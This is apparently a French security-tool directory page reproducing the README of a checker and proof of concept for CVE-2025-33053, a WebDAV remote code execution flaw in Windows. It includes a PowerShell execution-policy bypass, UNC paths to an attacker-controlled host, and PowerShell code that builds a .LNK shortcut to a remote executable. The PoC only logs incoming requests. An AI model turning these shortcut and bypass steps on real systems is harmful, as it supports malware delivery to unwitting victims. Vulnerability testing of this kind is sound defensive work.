Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-33053-Checker-PoC — CVE-2025-33053 Vérificateur et PoC | Kitploit
Outils/GitHubGitHub/thetorjancaptain/cve-2025-33053-checker-poc
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubthetorjancaptain/cve-2025-33053-checker-poc

CVE-2025-33053-Checker-PoC

CVE-2025-33053 Vérificateur et PoC

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
1il y a 1 anPas encore vérifié

CVE-2025-33053 Vérificateur de vulnérabilité et preuve de concept (PoC)

Preuve du vérificateur Preuve du vérificateur

Preuve du PoC Preuve du PoC

Un ensemble complet d'outils pour vérifier et démontrer l'exploitation potentielle de CVE-2025-33053, une vulnérabilité critique d'exécution de code à distance (RCE) basée sur WebDAV affectant les systèmes Windows.


📌 À propos de CVE-2025-33053

CVE-2025-33053 permet aux attaquants d'exploiter des fichiers de raccourci .LNK qui référencent des partages WebDAV distants malveillants, conduisant potentiellement à une exécution de code à distance (RCE) sur les systèmes affectés.

Conditions de vulnérabilité :

  • Le service WebClient doit être installé et en cours d'exécution sur la cible.
  • Le système d'exploitation cible doit résoudre les chemins UNC via WebDAV lorsque ces chemins sont accédés — même via des fichiers .LNK.

🔍 Comment fonctionne la vulnérabilité ?

  1. Fichier .LNK créé ou accès direct au chemin UNC — Pointe vers un chemin UNC distant comme :
  2. Lorsque le .LNK est accédé ou que le chemin UNC est parcouru manuellement (par exemple, via l'Explorateur de fichiers) :
    • Le service WebClient initie une communication vers l'emplacement UNC distant via WebDAV.
    • Le système envoie une requête PROPFIND pour interroger les métadonnées du serveur de l'attaquant.
  3. En recevant la requête PROPFIND, l'attaquant peut confirmer que :
    • Le système cible résout les chemins UNC via WebDAV.
    • Le système est potentiellement vulnérable à CVE-2025-33053.

✅ Vérificateur en temps réel de la vulnérabilité (CVE-2025-33053_checker.ps1)

Ce qu'il fait :

VérificationObjectif
🔍 Statut du service WebClientConfirme si le support WebDAV est actif et en cours d'exécution.
🔍 Gestion des chemins UNC via Test-PathTeste si le système résout les chemins UNC WebDAV distants (condition préalable clé pour l'exploitation CVE).

Comment exécuter :

  1. Ouvrez PowerShell en tant qu'administrateur.

  2. Si l'exécution de scripts est restreinte, exécutez :

root@kitploit:~
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
  1. Exécutez le vérificateur : .\CVE-2025-33053_checker.ps1

⚙️ Serveur de preuve de concept (PoC) (CVE-2025-33053_PoC.py)

Ce qu'il fait :

  • Met en place un serveur de type WebDAV basé sur Python sur la machine de l'attaquant.
  • Capture les requêtes PROPFIND entrantes lorsque le système victime résout le chemin UNC malveillant.
  • Affiche dans le terminal que le système a contacté le serveur — prouvant la possibilité d'exploitation. Remarque : Testé en machine virtuelle.

Utilisation :

  1. Sur la machine de l'attaquant (Kali) :
root@kitploit:~
python3 CVE-2025-33053_PoC.py --port 8000
  1. Sur la machine cible :

    • Ouvrez le chemin UNC directement dans l'Explorateur de fichiers :
    root@kitploit:~
    \\<Kali-IP>@8000\DavWWWRoot\route.exe
    
    • Créez manuellement un fichier .LNK dans Windows ou naviguez simplement vers :
    root@kitploit:~
    \\<Kali-IP>@8000\DavWWWRoot\route.exe
    
    • Exemple de méthode PowerShell pour créer un fichier de raccourci :
    root@kitploit:~
    $WScriptShell = New-Object -ComObject WScript.Shell
    $Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
    $Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
    $Shortcut.Save()
    
  2. Si la cible est vulnérable, le serveur PoC enregistrera :

root@kitploit:~
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!

🔍 Pourquoi ce PoC est légitime et fiable :

✔️ Utilise une résolution de chemin UNC réelle — pas de simulation. ✔️ Capture les requêtes PROPFIND réelles déclenchées par le système d'exploitation — comportement exact requis pour l'exploitation CVE. ✔️ Démontre une preuve réelle au niveau réseau de la vulnérabilité, sans exécuter de charges utiles ni causer de dommages.


🚧 Notes importantes

Ce PoC n'exploite ni ne nuit au système cible — il détecte uniquement le comportement vulnérable sous-jacent. Destiné à être utilisé dans des environnements contrôlés ou avec une autorisation explicite. Démontre un comportement réel du système — pas une simulation factice. À utiliser uniquement à des fins éducatives. Ne pas exécuter sur des systèmes non autorisés.


🏷️ Licence

Licence MIT — Gratuit à des fins éducatives, de recherche et défensives uniquement.


🤝 Contribution

Les pull requests sont les bienvenues — améliorez la détection, ajoutez des fonctionnalités ou suggérez des correctifs.


⚠️ Avertissement

Ce dépôt est uniquement destiné à la recherche en sécurité éducative et autorisée. L'utilisation abusive contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est strictement interdite.

Télécharger l’outil